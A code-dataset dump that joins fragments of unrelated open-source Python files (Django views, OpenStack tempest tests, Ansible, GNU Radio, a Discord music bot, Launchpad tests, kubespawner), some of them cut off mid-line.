closest = closest_pickles(stars, locus_list, locus_index, comp_list)
closest_index = closest[1][1]
import pylab
print 'plotting'
print spectra_complete[closest_index][0][:,0]
print spectra_complete[closest_index][0][:,1]
pylab.plot(spectra_complete[closest_index][0][:,0],spectra_complete[closest_index][0][:,1])
pylab.xlim(3000,11000)
pylab.show()
print 'plotted'
import pickle
f = open('picklelocus_MACS','r')
m = pickle.Unpickler(f)
stars = m.load()
locus_list = locus()
good = False
gmi_off = 0
gmr_off = 0
trys = 0
tol = 0.01
while not good:
trys += 1
#if trys > 4: tol = 0.02
#if trys > 6: tol = 0.03
#if trys > 10: tol = 0.05
print gmi, umg, gmr, imz
dicts = get_sdss_spectra(gmi-gmi_off,umg,gmr-gmr_off,imz,tol=tol)
if len(dicts):
print dicts
gmi_diffs = []
gmr_diffs = []
for dict in dicts:
spectrum = retrieve_sdss_spectra(dict,plot=False)
mags = synth([1.],[[spectrum]],filters,show= |
akuks/pretix | src/pretix/control/views/main.py | Python | apache-2.0 | 2,498 | 0 | from django.conf import settings
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import render
from django.utils.translation import ugettext_lazy as _
from django.views.generic import CreateView, ListView, TemplateView
from pretix.base.models import Event, EventPermission, OrganizerPermission
from pretix.control.forms.event import EventCreateForm
from pretix.control.permissions import OrganizerPermissionRequiredMixin
class EventList(ListView):
model = Event
context_object_name = 'events'
paginate_by = 30
template_name = 'pretixcontrol/events/index.html'
def get_queryset(self):
return Event.objects.current.filter(
permitted__id__ex | act=self.request.user.pk
).prefetch_related(
"organizer",
)
def index(request):
return render(request, 'pretixcontrol/dashboard.html', {})
class EventCreateStart(TemplateView):
template_name = 'pretixcontrol/events/start.html'
def get_context_data(self, **kwargs):
ctx = super().get_context_d | ata(**kwargs)
ctx['organizers'] = [
p.organizer for p in OrganizerPermission.objects.current.filter(
user=self.request.user, can_create_events=True
).select_related("organizer")
]
return ctx
class EventCreate(OrganizerPermissionRequiredMixin, CreateView):
model = Event
form_class = EventCreateForm
template_name = 'pretixcontrol/events/create.html'
context_object_name = 'event'
permission = 'can_create_events'
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['organizer'] = self.request.organizer
return kwargs
def form_valid(self, form):
messages.success(self.request, _('The new event has been created.'))
form.instance.organizer = self.request.organizer
ret = super().form_valid(form)
EventPermission.objects.create(
event=form.instance, user=self.request.user,
)
self.object = form.instance
self.object.plugins = settings.PRETIX_PLUGINS_DEFAULT
self.object.save()
return ret
def get_success_url(self) -> str:
return reverse('control:event.settings', kwargs={
'organizer': self.request.organizer.slug,
'event': self.object.slug,
})
|
IPVL/Tanvin-PythonWorks | chapter5/codes/forLoop.py | Python | mit | 353 | 0.016997 | #! / | usr/bin/env python
# example of for loop
words = ['this', 'is', 'an', 'ex', 'parrot']
for word in words:
print word,
print '\n'
# example of for loop in dictionary
d = {'x': 1, 'y': 2, 'z': 3}
for key in d:
print key, 'corresponds to', d[key]
# additional sequence unpacking in for loop
for key, value in d.items():
print key, 'to', val | ue |
tudorvio/tempest | tempest/api/compute/servers/test_servers_negative.py | Python | apache-2.0 | 21,412 | 0 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language g | overning permissions and limitations
# under the License.
import sys
from tempest_lib import exceptions as lib_exc
import testtools
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest.common import waiters
from tempe | st import config
from tempest import test
CONF = config.CONF
class ServersNegativeTestJSON(base.BaseV2ComputeTest):
credentials = ['primary', 'alt']
def setUp(self):
super(ServersNegativeTestJSON, self).setUp()
try:
waiters.wait_for_server_status(self.client, self.server_id,
'ACTIVE')
except Exception:
self.__class__.server_id = self.rebuild_server(self.server_id)
def tearDown(self):
self.server_check_teardown()
super(ServersNegativeTestJSON, self).tearDown()
@classmethod
def setup_clients(cls):
super(ServersNegativeTestJSON, cls).setup_clients()
cls.client = cls.servers_client
cls.alt_client = cls.os_alt.servers_client
@classmethod
def resource_setup(cls):
super(ServersNegativeTestJSON, cls).resource_setup()
server = cls.create_test_server(wait_until='ACTIVE')
cls.server_id = server['id']
@test.attr(type=['negative'])
@test.idempotent_id('dbbfd247-c40c-449e-8f6c-d2aa7c7da7cf')
def test_server_name_blank(self):
# Create a server with name parameter empty
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
name='')
@test.attr(type=['negative'])
@test.idempotent_id('b8a7235e-5246-4a8f-a08e-b34877c6586f')
def test_personality_file_contents_not_encoded(self):
# Use an unencoded file when creating a server with personality
file_contents = 'This is a test file.'
person = [{'path': '/etc/testfile.txt',
'contents': file_contents}]
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
personality=person)
@test.attr(type=['negative'])
@test.idempotent_id('fcba1052-0a50-4cf3-b1ac-fae241edf02f')
def test_create_with_invalid_image(self):
# Create a server with an unknown image
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
image_id=-1)
@test.attr(type=['negative'])
@test.idempotent_id('18f5227f-d155-4429-807c-ccb103887537')
def test_create_with_invalid_flavor(self):
# Create a server with an unknown flavor
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
flavor=-1,)
@test.attr(type=['negative'])
@test.idempotent_id('7f70a4d1-608f-4794-9e56-cb182765972c')
def test_invalid_access_ip_v4_address(self):
# An access IPv4 address must match a valid address pattern
IPv4 = '1.1.1.1.1.1'
self.assertRaises(lib_exc.BadRequest,
self.create_test_server, accessIPv4=IPv4)
@test.attr(type=['negative'])
@test.idempotent_id('5226dd80-1e9c-4d8a-b5f9-b26ca4763fd0')
def test_invalid_ip_v6_address(self):
# An access IPv6 address must match a valid address pattern
IPv6 = 'notvalid'
self.assertRaises(lib_exc.BadRequest,
self.create_test_server, accessIPv6=IPv6)
@test.idempotent_id('7ea45b3e-e770-46fa-bfcc-9daaf6d987c0')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_nonexistent_server(self):
# Resize a non-existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.client.resize,
nonexistent_server, self.flavor_ref)
@test.idempotent_id('ced1a1d7-2ab6-45c9-b90f-b27d87b30efd')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_server_with_non_existent_flavor(self):
# Resize a server with non-existent flavor
nonexistent_flavor = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest, self.client.resize,
self.server_id, flavor_ref=nonexistent_flavor)
@test.idempotent_id('45436a7d-a388-4a35-a9d8-3adc5d0d940b')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_server_with_null_flavor(self):
# Resize a server with null flavor
self.assertRaises(lib_exc.BadRequest, self.client.resize,
self.server_id, flavor_ref="")
@test.attr(type=['negative'])
@test.idempotent_id('d4c023a0-9c55-4747-9dd5-413b820143c7')
def test_reboot_non_existent_server(self):
# Reboot a non existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.reboot,
nonexistent_server, 'SOFT')
@test.idempotent_id('d1417e7f-a509-41b5-a102-d5eed8613369')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
@test.attr(type=['negative'])
def test_pause_paused_server(self):
# Pause a paused server.
self.client.pause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'PAUSED')
self.assertRaises(lib_exc.Conflict,
self.client.pause_server,
self.server_id)
self.client.unpause_server(self.server_id)
@test.attr(type=['negative'])
@test.idempotent_id('98fa0458-1485-440f-873b-fe7f0d714930')
def test_rebuild_reboot_deleted_server(self):
# Rebuild and Reboot a deleted server
server = self.create_test_server()
self.client.delete_server(server['id'])
waiters.wait_for_server_termination(self.client, server['id'])
self.assertRaises(lib_exc.NotFound,
self.client.rebuild,
server['id'], self.image_ref_alt)
self.assertRaises(lib_exc.NotFound, self.client.reboot,
server['id'], 'SOFT')
@test.attr(type=['negative'])
@test.idempotent_id('d86141a7-906e-4731-b187-d64a2ea61422')
def test_rebuild_non_existent_server(self):
# Rebuild a non existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.client.rebuild,
nonexistent_server,
self.image_ref_alt)
@test.attr(type=['negative'])
@test.idempotent_id('fd57f159-68d6-4c2a-902b-03070828a87e')
def test_create_numeric_server_name(self):
server_name = 12345
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
name=server_name)
@test.attr(type=['negative'])
@test.idempotent_id('c3e0fb12-07fc-4d76-a22e-37409887afe8')
def test_create_server_name_length_exceeds_256(self):
# Create a server with name length exceeding 256 characters
server_name = 'a' * 256
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
|
Dhivyap/ansible | lib/ansible/modules/cloud/ovirt/ovirt_host_info.py | Python | gpl-3.0 | 4,875 | 0.002667 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_host_info
short_description: Retrieve information about one or more oVirt/RHV hosts
author: "Ondra Machacek (@machacekondra)"
version_added: "2.3"
description:
- "Retrieve information about one or more oVirt/RHV hosts."
- This module was called C(ovirt_host_facts) before Ansible 2.9, returning C(ansible_facts).
Note that the M(ovirt_host_info) module no longer returns C(ansible_facts)!
notes:
- "This module returns a variable C(ovirt_hosts), which
contains a list of hosts. You need to register the result with
the I(register) keyword to use it."
options:
pattern:
description:
- "Search term which is accepted by oVirt/RHV search backend."
- "For example to search host X from datacenter Y use following pattern:
name=X and datacenter=Y"
all_content:
description:
- "If I(true) all the attributes of the hosts should be
included in the response."
default: False
version_added: "2.7"
type: bool
cluster_version:
description:
- "Filter the hosts based on the cluster version."
type: str
version_added: "2.8"
extends_documentation_fragment: ovirt_info
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Gather information about all hosts which names start with C(host) and
# belong to data center C(west):
- ovirt_host_info:
patt | ern: name=host* and datacenter=west
register: result
- debug:
msg: "{{ result.o | virt_hosts }}"
# All hosts with cluster version 4.2:
- ovirt_host_info:
pattern: name=host*
cluster_version: "4.2"
register: result
- debug:
msg: "{{ result.ovirt_hosts }}"
'''
RETURN = '''
ovirt_hosts:
description: "List of dictionaries describing the hosts. Host attributes are mapped to dictionary keys,
all hosts attributes can be found at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/host."
returned: On success.
type: list
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
check_sdk,
create_connection,
get_dict_of_struct,
ovirt_info_full_argument_spec,
)
def get_filtered_hosts(cluster_version, hosts, connection):
# Filtering by cluster version returns only those which have same cluster version as input
filtered_hosts = []
for host in hosts:
cluster = connection.follow_link(host.cluster)
cluster_version_host = str(cluster.version.major) + '.' + str(cluster.version.minor)
if cluster_version_host == cluster_version:
filtered_hosts.append(host)
return filtered_hosts
def main():
argument_spec = ovirt_info_full_argument_spec(
pattern=dict(default='', required=False),
all_content=dict(default=False, type='bool'),
cluster_version=dict(default=None, type='str'),
)
module = AnsibleModule(argument_spec)
is_old_facts = module._name == 'ovirt_host_facts'
if is_old_facts:
module.deprecate("The 'ovirt_host_facts' module has been renamed to 'ovirt_host_info', "
"and the renamed one no longer returns ansible_facts", version='2.13')
check_sdk(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
hosts_service = connection.system_service().hosts_service()
hosts = hosts_service.list(
search=module.params['pattern'],
all_content=module.params['all_content']
)
cluster_version = module.params.get('cluster_version')
if cluster_version is not None:
hosts = get_filtered_hosts(cluster_version, hosts, connection)
result = dict(
ovirt_hosts=[
get_dict_of_struct(
struct=c,
connection=connection,
fetch_nested=module.params.get('fetch_nested'),
attributes=module.params.get('nested_attributes'),
) for c in hosts
],
)
if is_old_facts:
module.exit_json(changed=False, ansible_facts=result)
else:
module.exit_json(changed=False, **result)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == '__main__':
main()
|
T3CHNOLOG1C/Plaidohlect | MusicBot/musicbot/bot.py | Python | apache-2.0 | 78,817 | 0.00373 | import os
import sys
import time
import shlex
import shutil
import inspect
import aiohttp
import discord
import asyncio
import traceback
from discord import utils
from discord.object import Object
from discord.enums import ChannelType
from discord.voice_client import VoiceClient
from discord.ext.commands.bot import _get_variable
from io import BytesIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from random import choice, shuffle
from collections import defaultdict
from musicbot.playlist import Playlist
from musicbot.player import MusicPlayer
from musicbot.config import Config, ConfigDefaults
from musicbot.permissions import Permissions, PermissionsDefaults
from musicbot.utils import load_file, write_file, sane_round_int
from . import exceptions
from . import downloader
from .opus_loader import load_opus_lib
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()
class SkipState:
def __init__(self):
self.skippers = set()
self.skip_msgs = set()
@property
def skip_count(self):
return len(self.skippers)
def reset(self):
self.skippers.clear()
self.skip_msgs.clear()
def add_skipper(self, skipper, msg):
self.skippers.add(skipper)
self.skip_msgs.add(msg)
return self.skip_count
class Response:
def __init__(self, content, reply=False, delete_after=0):
self.content = content
self.reply = reply
self.delete_after = delete_after
class MusicBot(discord.Client):
def __init__(self, config_file=ConfigDefaults.options_file, perms_file=PermissionsDefaults.perms_file):
self.players = {}
self.the_voice_clients = {}
self.locks = defaultdict(asyncio.Lock)
self.voice_client_connect_lock = asyncio.Lock()
self.voice_client_move_lock = asyncio.Lock()
self.config = Config(config_file)
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.downloader = downloader.Downloader(download_folder='audio_cache')
self.exit_signal = None
self.init_ok = False
self.cached_client_id = None
if not self.autoplaylist:
print("Warning: Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
# TODO: Do these properly
ssd_defaults = {'last_np_msg': None, 'auto_paused': False}
self.server_specific_data = defaultdict(lambda: dict(ssd_defaults))
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
# TODO: | Add some sort of `denied` | argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable('message')
if not orig_msg or orig_msg.author.id == self.config.owner_id:
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)
return wrapper
@staticmethod
def _fixg(x, dp=2):
return ('{:.%sf}' % dp).format(x).rstrip('0').rstrip('.')
def _get_owner(self, voice=False):
if voice:
for server in self.servers:
for channel in server.channels:
for m in channel.voice_members:
if m.id == self.config.owner_id:
return m
else:
return discord.utils.find(lambda m: m.id == self.config.owner_id, self.get_all_members())
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
# TODO: autosummon option to a specific channel
async def _auto_summon(self):
owner = self._get_owner(voice=True)
if owner:
self.safe_print("Found owner in \"%s\", attempting to join..." % owner.voice_channel.name)
# TODO: Effort
await self.cmd_summon(owner.voice_channel, owner, None)
return owner.voice_channel
async def _autojoin_channels(self, channels):
joined_servers = []
for channel in channels:
if channel.server in joined_servers:
print("Already joined a channel in %s, skipping" % channel.server.name)
continue
if channel and channel.type == discord.ChannelType.voice:
self.safe_print("Attempting to autojoin %s in %s" % (channel.name, channel.server.name))
chperms = channel.permissions_for(channel.server.me)
if not chperms.connect:
self.safe_print("Cannot join channel \"%s\", no permission." % channel.name)
continue
elif not chperms.speak:
self.safe_print("Will not join channel \"%s\", no permission to speak." % channel.name)
continue
try:
player = await self.get_player(channel, create=True)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
joined_servers.append(channel.server)
except Exception as e:
if self.config.debug_mode:
traceback.print_exc()
print("Failed to join", channel.name)
elif channel:
print("Not joining %s on %s, that's a text channel." % (channel.name, channel.server.name))
else:
print("Invalid channel thing: " + channel)
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
async def generate_invite_link(self, *, permissions=None, server=None):
if not self.cached_client_id:
appinfo = await self.application_info()
self.cached_client_id = appinfo.id
return discord.utils.oauth_url(self.cached_client_id, permissions=permissions, server=server)
async def get_voice_client(self, channel):
if isinstance(channel, Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
with await self.voice_client_connect_lock:
server = channel.server
if server.id in self.the_voice_clients:
return self.the_voice_clients[server.id]
s_id = self.ws.wait_for('VOICE_STATE_UPDATE', lambda d: d.get('user_id') == self.user.id)
_voice_data = self.ws.wait_for('VOICE_SERVER_UPDATE |
skoslowski/gnuradio | grc/core/blocks/embedded_python.py | Python | gpl-3.0 | 8,172 | 0.000857 | # Copyright 2015-16 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
from __future__ import absolute_import
from ast import literal_eval
from textwrap import dedent
from . import Block, register_build_in
from ._templates import MakoTemplates
from .. import utils
from ..base import Element
from ._build import build_params
DEFAULT_CODE = '''\
"""
Embedded Python Blocks:
Each time this file is saved, GRC will instantiate the first class it finds
to get ports and parameters of your block. The arguments to __init__ will
be the parameters. All of them are required to have default values!
"""
import numpy as np
from gnuradio import gr
class blk(gr.sync_block): # other base classes are basic_block, decim_block, interp_block
"""Embedded Python Block example - a simple multiply const"""
def __init__(self, example_param=1.0): # only default arguments here
"""arguments to this function show up as parameters in GRC"""
gr.sync_block.__init__(
self,
name='Embedded Python Block', # will show up in GRC
in_sig=[np.complex64],
out_sig=[np.complex64]
)
# if an attribute with the same name as a parameter is found,
# a callback is registered (properties work, too).
self.example_param = example_param
def work(self, input_items, output_items):
"""example: multiply with constant"""
output_items[0][:] = input_items[0] * self.example_param
return len(output_items[0])
'''
DOC = """
This block represents an arbitrary GNU Radio Python Block.
Its source code can be accessed through the parameter 'Code' which opens your editor. \
Each time you save changes in the editor, GRC will update the block. \
This includes the number, names and defaults of the parameters, \
the ports (stream and message) and the block name and documentation.
Block Documentation:
(will be replaced the docstring of your block class)
"""
@register_build_in
class EPyBlock(Block):
key = "epy_block"
label = "Python Block"
documentation = {"": DOC}
parameters_data = build_params(
params_raw=[
dict(
label="Code",
id="_source_code",
dtype="_multiline_python_external",
default=DEFAULT_CODE,
hide="part",
)
],
have_inputs=True,
have_outputs=True,
flags=Block.flags,
block_id=key,
)
inputs_data = []
outputs_data = []
def __init__(self, flow_graph, **kwargs):
super(EPyBlock, self).__init__(flow_graph, **kwargs)
self.states["_io_cache"] = ""
self._epy_source_hash = -1
self._epy_reload_error = None
def rewrite(self):
Element.rewrite(self)
param_src = self.params["_source_code"]
src = param_src.get_value()
src_hash = hash((self.name, src))
if src_hash == self._epy_source_hash:
return
try:
blk_io = utils.epy_block_io.extract(src)
except Exception as e:
self._epy_reload_error = ValueError(str(e))
try: # Load last working block io
blk_io_args = literal_eval(self.states["_io_cache"])
if len(blk_io_args) == 6:
blk_io_args += ([],) # add empty callbacks
blk_io = utils.epy_block_io.BlockIO(*blk_io_args)
except Exception:
return
else:
self._epy_reload_error = None # Clear previous errors
self.states["_io_cache"] = repr(tuple(blk_io))
# print "Rewriting embedded python block {!r}".format(self.name)
self._epy_source_hash = src_hash
self.label = blk_io.name or blk_io.cls
self.documentation = {"": blk_io.doc}
self.templates["imports"] = "import " + self.name
self.templates["make"] = "{mod}.{cls}({args})".format(
mod=self.name,
cls=blk_io.cls,
args=", ".join("{0}=${{ {0} }}".format(key) for key, _ in blk_io.params),
)
self.templates["callbacks"] = [
"{0} = ${{ {0} }}".format(attr) for attr in blk_io.callbacks
]
self._update_params(blk_io.params)
self._update_ports("in", self.sinks, blk_io.sinks, "sink")
self._update_ports("out", self.sources, blk_io.sources, "source")
super(EPyBlock, self).rewrite()
def _update_params(self, params_in_src):
param_factory = self.parent_platform.make_param
params = {}
for key, value in self.params.copy().items():
if hasattr(value, "__epy_param__"):
params[key] = value
del self.params[key]
for id_, value in params_in_src:
try:
param = params[id_]
if param.default == param.value:
param.set_value(value)
param.default = str(value)
except KeyError: # need to make a new param
param = param_factory(
parent=self,
id=id_,
dtype="raw",
value=value,
name=id_.replace("_", " ").title(),
)
setattr(param, "__epy_param__", True)
self.params[id_] = param
def _update_ports(self, label, ports, port_specs, direction):
port_factory = self.parent_platform.make_port
ports_to_remove = list(ports)
iter_ports = iter(ports)
ports_new = []
port_current = next(iter_ports, None)
for key, port_type, vlen in port_specs:
reuse_port = (
port_current is not None
and port_current.dtype == port_type
and port_current.vlen == vlen
and (key.isdigit() or port_current.key == key)
)
if reuse_port:
ports_to_remove.remove(port_current)
port, port_current = port_current, next(iter_ports, None)
else:
n = dict(name=label + str(key), dtype=port_type, id=key)
if port_type == "message":
n["name"] = key
n["optional"] = "1"
if vlen > 1:
n["vlen"] = str(vlen)
port = port_factory(self, direction=direction, **n)
ports_new.append(port)
# replace old port list with new one
del ports[:]
ports.extend(ports_new)
# remove excess port connections
self.parent_flowgraph.disconnect(*ports_to_remove)
def validate(self):
super(EPyBlock, self).validate()
if self._epy_reload_error:
self.params["_source_code"].add_error_message(str(self._epy_reload_error))
@register_build_in
class EPyModule(Block):
key = "epy_module"
label = "Python Module"
document | ation = {
| "": dedent(
"""
This block lets you embed a python module in your flowgraph.
Code you put in this module is accessible in other blocks using the ID of this
block. Example:
If you put
a = 2
def double(arg):
return 2 * arg
in a Python Module Block with the ID 'stuff' you can use code like
stuff.a # evals to 2
stuff.double(3) # evals to 6
to set parameters of other blocks in your flowgraph.
"""
)
}
epy_flags = Block.flags
epy_flags.set(epy_flags.SHOW_ID)
parameters_data = build_params(
params_raw=[
dict(
label="Code",
id="source_code",
dtype="_multiline_python_external",
default="# this module will be imported in the into your flowgraph",
hide="part",
)
],
have_inputs=False,
have_outputs=False,
flags=epy_flags,
block_id=key,
)
templates = MakoTemplates(imports="import ${ id } # embedded python module",)
|
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/registry/tests/test_oopsreferences.py | Python | agpl-3.0 | 7,128 | 0.001263 | # Copyright 2009-2011 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests of the oopsreferences core."""
__metaclass__ = type
from datetime import (
datetime,
timedelta,
)
from pytz import utc
from lp.registry.model.oopsreferences import referenced_oops
from lp.services.database.interfaces import IStore
from lp.services.messages.model.message import (
Message,
MessageSet,
)
from lp.testing import (
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestOopsReferences(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def setUp(self):
super(TestOopsReferences, self).setUp()
self.store = IStore(Message)
def test_oops_in_messagechunk(self):
oopsid = "OOPS-abcdef1234"
MessageSet().fromText('foo', "foo %s bar" % oopsid)
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=1", {}))
self.failUnlessEqual(
set(),
referenced_oops(now + day, now + day, "product=1", {}))
def test_oops_in_messagesubject(self):
oopsid = "OOPS-abcdef1234"
self.factory.makeEmailMessage()
MessageSet().fromText("Crash with %s" % oopsid, "body")
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=1", {}))
self.failUnlessEqual(
set(),
referenced_oops(now + day, now + day, "product=1", {}))
def test_oops_in_bug_title(self):
oopsid = "OOPS-abcdef1234"
bug = self.factory.makeBug()
with person_logged_in(bug.owner):
bug.title = "Crash with %s" % oopsid
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=1", {}))
self.failUnlessEqual(
set(),
referenced_oops(now + day, now + day, "product=1", {}))
def test_oops_in_bug_description(self):
oopsid = "OOPS-abcdef1234"
bug = self.factory.makeBug()
with person_logged_in(bug.owner):
bug.description = "Crash with %s" % oopsid
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=1", {}))
self.failUnlessEqual(
set(),
referenced_oops(now + day, now + day, "product=1", {}))
def test_oops_in_question_title(self):
oopsid = "OOPS-abcdef1234"
question = self.factory.makeQuestion(title="Crash with %s" % oopsid)
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=%(product)s",
{'product': question.product.id}))
self.failUnlessEqual(
set([]),
referenced_oops(now + day, now + day, "product=%(product)s",
{'product': question.product.id}))
def test_oops_in_question_wrong_context(self):
oopsid = "OOPS-abcdef1234"
question = self.factory.makeQuestion(title="Crash with %s" % oopsid)
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.store.flush()
self.failUnlessEqual(
set(),
referenced_oops(now - day, now, "product=%(product)s",
{'product': question.product.id + 1}))
def test_oops_in_question_description(self):
oopsid = "OOPS-abcdef1234"
question = self.factory.makeQuestion(
description="Crash with %s" % oopsid)
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=%(product)s",
{'product': question.product.id}))
self.failUnlessEqual(
set([]),
referenced_oops(now + day, now + day, "product=%(product)s",
{'product': question.product.id}))
def test_oops_in_question_whiteboard(self):
oopsid = "OOPS-abcdef1234"
question = self.factory.makeQuestion()
with person_logged_in(question.owner):
question.whiteboard = "Crash with %s" % oopsid
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "product=%(product)s",
{'product': question.product.id}))
self.failUnlessEqual(
set([]),
referenced_oops(now + day, now + day, "product=%(product)s",
{'product': question.product.id}))
def test_oops_in_question_distribution(self):
oopsid = "OOPS-abcdef1234"
distro = self.factory.makeDistribution()
question = self.factory.makeQuestion(target=distro)
with person_logged_in(question.owner):
question.whiteboard = "Crash with %s" % oopsid
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid]),
referenced_oops(now - day, now, "distribution=%(distribution)s",
{'distribution': distro.id}))
self.failUnlessEqual(
set([]),
referenced_oops(now + day, now + day,
"distribution=%(distribution)s", {'distribution': distro.id}))
def test_referenced_oops_in_urls_bug_663249(self):
# Sometimes OOPS ids appears as part of an URL. These should could as
# a reference even though they are not formatted specially - this
# requires somewhat special handling in the reference calculation
# function.
oopsid_old = "OOPS-abcdef1234"
oopsid_new = "OOPS-4321"
bug_old = self.factory.makeBug()
bug_new = self.factory.makeBug()
with person_logged_in(bug_old.owner):
bug_old.description | = (
"foo https://lp-oops.canonical.com/oops.py?oopsid=%s bar"
% oopsid_old)
with person_logged_in(bug_new.owner):
bug_new.description = (
"foo https: | //oops.canonical.com/oops.py?oopsid=%s bar"
% oopsid_new)
self.store.flush()
now = datetime.now(tz=utc)
day = timedelta(days=1)
self.failUnlessEqual(
set([oopsid_old, oopsid_new]),
referenced_oops(now - day, now, "product=1", {}))
self.failUnlessEqual(
set([]),
referenced_oops(now + day, now + day, "product=1", {}))
|
jupyterhub/kubespawner | kubespawner/spawner.py | Python | bsd-3-clause | 109,371 | 0.002076 | """
JupyterHub Spawner to spawn user notebooks on a Kubernetes cluster.
This module exports `KubeSpawner` class, which is the actual spawner
implementation that should be used by JupyterHub.
"""
import asyncio
import os
import signal
import string
import sys
import warnings
from functools import partial
from functools import wraps
from urllib.parse import urlparse
import escapism
from jinja2 import BaseLoader
from jinja2 import Environment
from jupyterhub.spawner import Spawner
from jupyterhub.traitlets import Command
from jupyterhub.utils import exponential_backoff
from kubernetes_asyncio import client
from kubernetes_asyncio.client.rest import ApiException
from slugify import slugify
from tornado import gen
from traitlets import Bool
from traitlets import default
from traitlets import Dict
from traitlets import Integer
from traitlets import List
from traitlets import observe
from traitlets import Unicode
from traitlets import Union
from traitlets import validate
from .clients import load_config
from .clients import shared_client
from .objects import make_namespace
from .objects import make_owner_reference
from .objects import make_pod
from .objects import make_pvc
from .objects import make_secret
from .objects import make_service
from .reflector import ResourceReflector
